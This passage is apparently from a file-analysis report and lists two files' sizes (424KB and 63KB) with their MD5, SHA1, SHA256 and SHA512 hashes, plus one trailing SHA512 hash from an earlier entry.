SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
63KB
MD5821ea58e3e9b6539ff0affd40e59f962
SHA1635a301d847f3a2e85f21f7ee12add7692873569
SHA256a06d135690ec5c5c753dd6cb8b4fe9bc8d23ca073ef9c0d8bb1b4b54271f56bb
SHA5120d08235781b81ff9e0a75f0e220a8d368d95ee75bf482670e83696e59d991aad68310ae7fa677ac96ffad1f97b3ec7d7208dc26d2edb111c39213b32502b82f6